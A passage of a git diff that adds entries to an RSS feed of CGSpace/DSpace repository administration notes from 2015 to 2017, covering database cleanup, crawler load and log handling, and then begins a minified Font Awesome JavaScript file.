(select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +COPY 54701 +</code></pre> + + + + October, 2017 + https://alanorth.github.io/cgspace-notes/2017-10/ + Sun, 01 Oct 2017 08:07:54 +0300 + + https://alanorth.github.io/cgspace-notes/2017-10/ + <h2 id="2017-10-01">2017-10-01</h2> +<ul> +<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li> +</ul> +<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336 +</code></pre><ul> +<li>There appears to be a pattern 
but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li> +<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li> +</ul> + + + + CGIAR Library Migration + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + Mon, 18 Sep 2017 16:38:35 +0300 + + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p> + + + + September, 2017 + https://alanorth.github.io/cgspace-notes/2017-09/ + Thu, 07 Sep 2017 16:54:52 +0700 + + https://alanorth.github.io/cgspace-notes/2017-09/ + <h2 id="2017-09-06">2017-09-06</h2> +<ul> +<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li> +</ul> +<h2 id="2017-09-07">2017-09-07</h2> +<ul> +<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li> +</ul> + + + + August, 2017 + https://alanorth.github.io/cgspace-notes/2017-08/ + Tue, 01 Aug 2017 11:51:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-08/ + <h2 id="2017-08-01">2017-08-01</h2> +<ul> +<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li> +<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li> +<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li> +<li>This means our Tomcat Crawler Session Valve is working</li> +<li>But many of the bots are browsing dynamic URLs like: +<ul> +<li>/handle/10568/3353/discover</li> +<li>/handle/10568/16510/browse</li> +</ul> +</li> +<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li> +<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li> +<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li> +<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li> +<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li> +<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li> +<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li> +<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li> +<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li> +</ul> + + + + July, 2017 + https://alanorth.github.io/cgspace-notes/2017-07/ + Sat, 01 Jul 2017 18:03:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-07/ + <h2 id="2017-07-01">2017-07-01</h2> +<ul> +<li>Run system updates and reboot 
DSpace Test</li> +</ul> +<h2 id="2017-07-04">2017-07-04</h2> +<ul> +<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li> +<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li> +<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li> +</ul> + + + + June, 2017 + https://alanorth.github.io/cgspace-notes/2017-06/ + Thu, 01 Jun 2017 10:14:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-06/ + 2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg. + + + + May, 2017 + https://alanorth.github.io/cgspace-notes/2017-05/ + Mon, 01 May 2017 16:21:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-05/ + 2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items that are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSpace Test) tomorrow: https://cgspace. 
+ + + + April, 2017 + https://alanorth.github.io/cgspace-notes/2017-04/ + Sun, 02 Apr 2017 17:08:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-04/ + <h2 id="2017-04-02">2017-04-02</h2> +<ul> +<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li> +<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p> +<ul> +<li>Remove redundant/duplicate text in the DSpace submission license</li> +<li>Testing the CMYK patch on a collection with 650 items:</li> +</ul> +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt +</code></pre> + + + + March, 2017 + https://alanorth.github.io/cgspace-notes/2017-03/ + Wed, 01 Mar 2017 17:08:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-03/ + <h2 id="2017-03-01">2017-03-01</h2> +<ul> +<li>Run the 279 CIAT author corrections on CGSpace</li> +</ul> +<h2 id="2017-03-02">2017-03-02</h2> +<ul> +<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li> +<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li> +<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li> +<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li> +<li>Need to send Peter and Michael some notes about this in a few days</li> +<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li> +<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li> +<li>Discovered that the ImageMagick <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li> +<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li> +</ul> +<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg +/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000 +</code></pre> + + + + February, 2017 + https://alanorth.github.io/cgspace-notes/2017-02/ + Tue, 07 Feb 2017 07:04:52 -0800 + + https://alanorth.github.io/cgspace-notes/2017-02/ + <h2 id="2017-02-07">2017-02-07</h2> +<ul> +<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> +</ul> +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; + id | collection_id | item_id +-------+---------------+--------- + 92551 | 313 | 80278 + 92550 | 313 | 80278 + 90774 | 1051 | 80278 +(3 rows) +dspace=# delete from collection2item where id = 92551 and item_id = 80278; +DELETE 1 +</code></pre><ul> +<li>Create issue 
on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li> +<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li> +</ul> + + + + January, 2017 + https://alanorth.github.io/cgspace-notes/2017-01/ + Mon, 02 Jan 2017 10:43:00 +0300 + + https://alanorth.github.io/cgspace-notes/2017-01/ + <h2 id="2017-01-02">2017-01-02</h2> +<ul> +<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li> +<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li> +<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li> +</ul> + + + + December, 2016 + https://alanorth.github.io/cgspace-notes/2016-12/ + Fri, 02 Dec 2016 10:43:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-12/ + <h2 id="2016-12-02">2016-12-02</h2> +<ul> +<li>CGSpace was down for five hours in the morning while I was sleeping</li> +<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> +</ul> +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +</code></pre><ul> +<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> +<li>I&rsquo;ve 
raised a ticket with Atmire to ask</li> +<li>Another worrying error from dspace.log is:</li> +</ul> + + + + November, 2016 + https://alanorth.github.io/cgspace-notes/2016-11/ + Tue, 01 Nov 2016 09:21:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-11/ + <h2 id="2016-11-01">2016-11-01</h2> +<ul> +<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p> + + + + October, 2016 + https://alanorth.github.io/cgspace-notes/2016-10/ + Mon, 03 Oct 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-10/ + <h2 id="2016-10-03">2016-10-03</h2> +<ul> +<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li> +<li>Need to test the following scenarios to see how author order is affected: +<ul> +<li>ORCIDs only</li> +<li>ORCIDs plus normal authors</li> +</ul> +</li> +<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new column called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li> +</ul> +<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X +</code></pre> + + + + September, 2016 + https://alanorth.github.io/cgspace-notes/2016-09/ + Thu, 01 Sep 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-09/ + <h2 id="2016-09-01">2016-09-01</h2> +<ul> +<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li> +<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li> +<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> +<li>It looks like we might be able to use OUs now, instead of DCs:</li> +</ul> +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; +</code></pre> + + + + August, 2016 + https://alanorth.github.io/cgspace-notes/2016-08/ + Mon, 01 Aug 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-08/ + <h2 id="2016-08-01">2016-08-01</h2> +<ul> +<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li> +<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions out of date</li> +<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li> +<li>bower stuff is a dead end, waste of time, too many issues</li> +<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li> +<li>Start working on DSpace 5.1 → 5.5 port:</li> +</ul> +<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod +$ git reset --hard ilri/5_x-prod +$ git rebase -i dspace-5.5 +</code></pre> + + + + July, 2016 + https://alanorth.github.io/cgspace-notes/2016-07/ + Fri, 01 Jul 2016 10:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-07/ + <h2 
id="2016-07-01">2016-07-01</h2> +<ul> +<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> +<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> +</ul> +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; +UPDATE 95 +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; + text_value +------------ +(0 rows) +</code></pre><ul> +<li>In this case the select query was showing 95 results before the update</li> +</ul> + + + + June, 2016 + https://alanorth.github.io/cgspace-notes/2016-06/ + Wed, 01 Jun 2016 10:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-06/ + <h2 id="2016-06-01">2016-06-01</h2> +<ul> +<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li> +<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li> +<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li> +<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li> +<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li> +<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li> +</ul> + + + + May, 2016 + https://alanorth.github.io/cgspace-notes/2016-05/ + Sun, 01 May 2016 23:06:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-05/ + <h2 id="2016-05-01">2016-05-01</h2> +<ul> +<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li> +<li>I have blocked access to the API now</li> +<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> +</ul> +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l +3168 +</code></pre> + + + + April, 2016 + https://alanorth.github.io/cgspace-notes/2016-04/ + Mon, 04 Apr 2016 11:06:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-04/ + <h2 id="2016-04-04">2016-04-04</h2> +<ul> +<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li> +<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li> +<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li> +<li>This will save us a few gigs 
of backup space we&rsquo;re paying for on S3</li> +<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li> +</ul> + + + + March, 2016 + https://alanorth.github.io/cgspace-notes/2016-03/ + Wed, 02 Mar 2016 16:50:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-03/ + <h2 id="2016-03-02">2016-03-02</h2> +<ul> +<li>Looking at issues with author authorities on CGSpace</li> +<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li> +<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li> +</ul> + + + + February, 2016 + https://alanorth.github.io/cgspace-notes/2016-02/ + Fri, 05 Feb 2016 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-02/ + <h2 id="2016-02-05">2016-02-05</h2> +<ul> +<li>Looking at some DAGRIS data for Abenet Yabowork</li> +<li>Lots of issues with spaces, newlines, etc causing the import to fail</li> +<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p> +<ul> +<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li> +<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li> +</ul> + + + + January, 2016 + https://alanorth.github.io/cgspace-notes/2016-01/ + Wed, 13 Jan 2016 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-01/ + <h2 id="2016-01-13">2016-01-13</h2> +<ul> +<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li> +<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li> +<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li> +</ul> + + + + December, 2015 + https://alanorth.github.io/cgspace-notes/2015-12/ + Wed, 02 Dec 2015 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2015-12/ + <h2 id="2015-12-02">2015-12-02</h2> +<ul> +<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li> +</ul> +<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log +# ls -lh dspace.log.2015-11-18* +-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18 +-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo +-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz +</code></pre> + + + + November, 2015 + https://alanorth.github.io/cgspace-notes/2015-11/ + Mon, 23 Nov 2015 17:00:57 +0300 + + https://alanorth.github.io/cgspace-notes/2015-11/ + <h2 id="2015-11-22">2015-11-22</h2> +<ul> +<li>CGSpace went down</li> +<li>Looks like DSpace exhausted its PostgreSQL connection pool</li> +<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> +</ul> +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c 
cgspace +78 +</code></pre> + + + + diff --git a/docs/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js b/docs/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js new file mode 100644 index 000000000..bd6d61a39 --- /dev/null +++ b/docs/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js @@ -0,0 +1,2 @@ +/*! For license information please see fontawesome.min.js.LICENSE.txt */ +(()=>{"use strict";var t={};function n(t){return n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},n(t)}function e(t,n){for(var e=0;e-1;r--){var i=e[r],o=(i.tagName||"").toUpperCase();["STYLE","LINK"].indexOf(o)>-1&&(a=i)}return p.head.insertBefore(n,a),t}}function pt(){for(var t=12,n="";t-- >0;)n+="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"[62*Math.random()|0];return n}function ht(t){for(var n=[],e=(t||[]).length>>>0;e--;)n[e]=t[e];return n}function gt(t){return t.classList?ht(t.classList):(t.getAttribute("class")||"").split(" ").filter((function(t){return t}))}function vt(t){return"".concat(t).replace(/&/g,"&").replace(/"/g,""").replace(/'/g,"'").replace(//g,">")}function bt(t){return Object.keys(t||{}).reduce((function(n,e){return n+"".concat(e,": ").concat(t[e],";")}),"")}function yt(t){return t.size!==mt.size||t.x!==mt.x||t.y!==mt.y||t.rotate!==mt.rotate||t.flipX||t.flipY}function wt(t){var n=t.transform,e=t.containerWidth,a=t.iconWidth,r={transform:"translate(".concat(e/2," 256)")},i="translate(".concat(32*n.x,", ").concat(32*n.y,") "),o="scale(".concat(n.size/16*(n.flipX?-1:1),", ").concat(n.size/16*(n.flipY?-1:1),") "),c="rotate(".concat(n.rotate," 0 0)");return{outer:r,inner:{transform:"".concat(i," ").concat(o," ").concat(c)},path:{transform:"translate(".concat(a/2*-1," -256)")}}}var xt={x:0,y:0,width:"100%",height:"100%"};function kt(t){var n=!(arguments.length>1&&void 0!==arguments[1])||arguments[1];return t.attributes&&(t.attributes.fill||n)&&(t.attributes.fill="black"),t}function _t(t){var n=t.icons,e=n.main,a=n.mask,i=t.prefix,o=t.iconName,c=t.transform,s=t.symbol,f=t.title,l=t.maskId,u=t.titleId,m=t.extra,d=t.watchable,p=void 0!==d&&d,h=a.found?a:e,g=h.width,v=h.height,b="fak"===i,y=b?"":"fa-w-".concat(Math.ceil(g/v*16)),x=[R.replacementClass,o?"".concat(R.familyPrefix,"-").concat(o):"",y].filter((function(t){return-1===m.classes.indexOf(t)})).filter((function(t){return""!==t||!!t})).concat(m.classes).join(" "),k={children:[],attributes:r({},m.attributes,{"data-prefix":i,"data-icon":o,class:x,role:m.attributes.role||"img",xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 ".concat(g," ").concat(v)})},_=b&&!~m.classes.indexOf("fa-fw")?{width:"".concat(g/v*16*.0625,"em")}:{};p&&(k.attributes[w]=""),f&&k.children.push({tag:"title",attributes:{id:k.attributes["aria-labelledby"]||"title-".concat(u||pt())},children:[f]});var A=r({},k,{prefix:i,iconName:o,main:e,mask:a,maskId:l,transform:c,symbol:s,styles:r({},_,m.styles)}),M=a.found&&e.found?function(t){var 
n,e=t.children,a=t.attributes,i=t.main,o=t.mask,c=t.maskId,s=t.transform,f=i.width,l=i.icon,u=o.width,m=o.icon,d=wt({transform:s,containerWidth:u,iconWidth:f}),p={tag:"rect",attributes:r({},xt,{fill:"white"})},h=l.children?{children:l.children.map(kt)}:{},g={tag:"g",attributes:r({},d.inner),children:[kt(r({tag:l.tag,attributes:r({},l.attributes,d.path)},h))]},v={tag:"g",attributes:r({},d.outer),children:[g]},b="mask-".concat(c||pt()),y="clip-".concat(c||pt()),w={tag:"mask",attributes:r({},xt,{id:b,maskUnits:"userSpaceOnUse",maskContentUnits:"userSpaceOnUse"}),children:[p,v]},x={tag:"defs",children:[{tag:"clipPath",attributes:{id:y},children:(n=m,"g"===n.tag?n.children:[n])},w]};return e.push(x,{tag:"rect",attributes:r({fill:"currentColor","clip-path":"url(#".concat(y,")"),mask:"url(#".concat(b,")")},xt)}),{children:e,attributes:a}}(A):function(t){var n=t.children,e=t.attributes,a=t.main,i=t.transform,o=bt(t.styles);if(o.length>0&&(e.style=o),yt(i)){var c=wt({transform:i,containerWidth:a.width,iconWidth:a.width});n.push({tag:"g",attributes:r({},c.outer),children:[{tag:"g",attributes:r({},c.inner),children:[{tag:a.icon.tag,children:a.icon.children,attributes:r({},a.icon.attributes,c.path)}]}]})}else n.push(a.icon);return{children:n,attributes:e}}(A),O=M.children,N=M.attributes;return A.children=O,A.attributes=N,s?function(t){var n=t.prefix,e=t.iconName,a=t.children,i=t.attributes,o=t.symbol;return[{tag:"svg",attributes:{style:"display: none;"},children:[{tag:"symbol",attributes:r({},i,{id:!0===o?"".concat(n,"-").concat(R.familyPrefix,"-").concat(e):o}),children:a}]}]}(A):function(t){var n=t.children,e=t.main,a=t.mask,i=t.attributes,o=t.styles,c=t.transform;if(yt(c)&&e.found&&!a.found){var s={x:e.width/e.height/2,y:.5};i.style=bt(r({},o,{"transform-origin":"".concat(s.x+c.x/16,"em ").concat(s.y+c.y/16,"em")}))}return[{tag:"svg",attributes:i,children:n}]}(A)}function At(t){var n=t.content,e=t.width,a=t.height,i=t.transform,o=t.title,c=t.extra,s=t.watchable,f=void 0!==s&&s,l=r({},c.attributes,o?{title:o}:{},{class:c.classes.join(" ")});f&&(l[w]="");var u=r({},c.styles);yt(i)&&(u.transform=function(t){var n=t.transform,e=t.width,a=void 0===e?16:e,r=t.height,i=void 0===r?16:r,o=t.startCentered,c=void 0!==o&&o,s="";return s+=c&&b?"translate(".concat(n.x/ut-a/2,"em, ").concat(n.y/ut-i/2,"em) "):c?"translate(calc(-50% + ".concat(n.x/ut,"em), calc(-50% + ").concat(n.y/ut,"em)) "):"translate(".concat(n.x/ut,"em, ").concat(n.y/ut,"em) "),(s+="scale(".concat(n.size/ut*(n.flipX?-1:1),", ").concat(n.size/ut*(n.flipY?-1:1),") "))+"rotate(".concat(n.rotate,"deg) ")}({transform:i,startCentered:!0,width:e,height:a}),u["-webkit-transform"]=u.transform);var m=bt(u);m.length>0&&(l.style=m);var d=[];return d.push({tag:"span",attributes:l,children:[n]}),o&&d.push({tag:"span",attributes:{class:"sr-only"},children:[o]}),d}var Mt=function(){},Ot=R.measurePerformance&&g&&g.mark&&g.measure?g:{mark:Mt,measure:Mt},Nt='FA "5.15.4"',Ct=function(t){return Ot.mark("".concat(Nt," ").concat(t," begins")),function(){return function(t){Ot.mark("".concat(Nt," ").concat(t," ends")),Ot.measure("".concat(Nt," ").concat(t),"".concat(Nt," ").concat(t," begins"),"".concat(Nt," ").concat(t," ends"))}(t)}},Et=function(t,n,e,a){var r,i,o,c=Object.keys(t),s=c.length,f=void 0!==a?function(t,n){return function(e,a,r,i){return 